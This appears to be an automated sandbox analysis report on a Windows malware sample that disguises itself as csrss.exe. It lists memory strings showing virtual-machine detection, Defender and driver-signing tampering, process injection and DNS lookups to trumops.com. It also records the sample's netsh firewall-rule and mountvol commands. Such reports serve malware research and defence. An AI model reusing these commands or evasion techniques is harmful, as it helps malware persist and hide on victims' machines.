vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeaudiodg.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWMIADAP.exewmiadap.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exeWbemScripting.SWbemLocatorWbemScripting.SWbemLocator780aa3f8331d9be005c9e655448606539acd816f3c5e40127bf62779fbda063f780aa3f8331d9be005c9e655448606539acd816f3c5e40127bf62779fbda063f
          Source: jkDmft1Qoe.exe, 00000004.00000002.681205566.00000000118C2000.00000004.00000001.sdmpBinary or memory string: SELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProSELECT Name FROM Win32_ProcessorIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzintel(r) xeon(r) cpu e5-2673 v3 @ 2.40ghzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzintel(r) xeon(r) cpu e5-2673 v4 @ 2.30ghzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzintel(r) xeon(r) platinum 8171m cpu @ 2.60ghzintel(r) core(tm)2 cpu 6600 @ 2.40 ghzHKEY_USERS\ones\Desktop\jkDmft1Qoe.exe" "C:\Users\user\Desktop\jkDmft1Qoe.exe" S-1-5-21-3853321935-2125563209-4053062332-1002SilentDustFirstInstallDateIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzc:\users\user\desktop\jkdmft1qoe.exeintel(r) core(tm)2 cpu 6600 @ 2.40 ghzcsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exeWmiPrvSE.exesvchost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exeHxTsr.exedllhost.exesvchost.execsrss.exewininit.exeSearchUI.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exesvchost.exedllhost.exesvchost.exeaudiodg.exesvchost.exesvchost.exeWMIADAP.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exeHxTsr.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exedllhost.exesvchost.exeaudiodg.exesvchost.exesvchost.exeWMIADAP.exeWmiPrvSE.exeWmiPrvSE.execonhost.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: systemvmsrvc.exe
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
          Source: jkDmft1Qoe.exe, 00000004.00000002.681293770.00000000118DC000.00000004.00000001.sdmpBinary or memory string: smss.execsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exeWmiPrvSE.exewmiprvse.exesvchost.exesgrmbroker.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exexennet6
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: l}main.isRunningInsideVMWare
          Source: csrss.exeBinary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
          Source: jkDmft1Qoe.exe, 00000004.00000002.681293770.00000000118DC000.00000004.00000001.sdmpBinary or memory string: jkDmft1Qoe.exewindefender.exejkDmft1Qoe.exeDefenderC:\Windows\rssCreateDirectoryWC:\Windows\rssGetFileAttributesWSetFileAttributesWC:\Windows\rss\csrss.exe"C:\Windows\rss\csrss.exe"SilentDustC:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exeC:\Windows\rssC:\Windows\rss\csrss.exeCOMPUTERNAME=computerHOMEPATH=\Windows\system32NUMBER_OF_PROCESSORS=2PROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramW6432=C:\Program FilesPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Windows\TEMPTMP=C:\Windows\TEMPUSERDOMAIN=WORKGROUPUSERNAME=computer$windir=C:\Windowscommonprogramfilescommonprogramfiles(x86)commonprogramw6432number_of_processorsprocessor_architectureprocessor_architew6432processor_identifierprocessor_revisionprogramfiles(x86)C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ""WmiPrvSE.exesvchost.exesvchost.exesvchost.exesvchost.exedllhost.exesvchost.exeaudiodg.exesvchost.exesvchost.exeWMIADAP.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.execsrss.exewininit.execsrss.exeservices.exewinlogon.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeGlobal\h48yorbq6rm87zotALLUSERSPROFILE=C:\ProgramDataComSpec=C:\Windows\system32\cmd.exeHOMEDRIVE=C:ProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)C:\Users\user\AppData\Local\TempC:\Users\user\AppData\Local\Temp\csrssC:\Users\user\AppData\Local\TempC:\Users\user\AppData\Local\Temp\wupC:\Users\user\AppData\Roaming\SilentDustC:\Users\user\Desktop\jkDmft1Qoe.exec:\users\user\desktop\jkdmft1qoe.exeC:\Users\user\AppData\Local\Temp\csrssC:\Users\user\AppData\Local\Temp\csrssC:\Users\user\AppData\Roaming\SilentDustC:\Users\user\AppData\Roaming\SilentDustC:\Users\user\AppData\Local\Temp\wupC:\Users\user\AppData\Local\Temp\wupC:\WindowsC:\Users\user\AppData\Lo
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: GPUARO92HUGCloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry$
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: CoInitializeExsvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeaudiodg.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWMIADAP.exewmiadap.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.execonhost.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exejkdmft1qoe.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exejkdmft1qoe.exevboxtray.exevboxservice.exeOpenSCManagerWOpenServiceWVBoxSF$
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpBinary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exe[system process]vmsrvc.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmpBinary or memory string: vmxnetvmx86
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmpBinary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesgrmbroker.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeCreateFileW
          Source: jkDmft1Qoe.exe, 00000004.00000002.681321286.00000000118E2000.00000004.00000001.sdmpBinary or memory string: vmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exejkdmft1qoe.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exejkdmft1qoe.exevmsrvc.exevmusrvc.exevpc-s3svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exedllhost.exesvchost.exeaudiodg.exesvchost.exesvchost.exeWMIADAP.exewmiadap.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.execonhost.exeUsoClient.exeusoclient.exesvchost.exesvchost.exeHxTsr.exehxtsr.exe
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61488E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FF61488E1D4
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A9D3C GetProcessHeap,35_2_00007FF6148A9D3C
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61488D8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo,35_2_00007FF61488D8BC
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61488DE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00007FF61488DE24
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61488E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FF61488E1D4
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61488E37C SetUnhandledExceptionFilter,35_2_00007FF61488E37C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61489543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FF61489543C

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Contains functionality to inject threads in other processesShow sources
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148827F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,35_2_00007FF6148827F0
          Performs DNS TXT record lookupsShow sources
          Source: TrafficDNS traffic detected: queries for: trumops.com
          Source: TrafficDNS traffic detected: queries for: logs.trumops.com
          Source: TrafficDNS traffic detected: queries for: 8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.com
          Source: TrafficDNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'Jump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yesJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
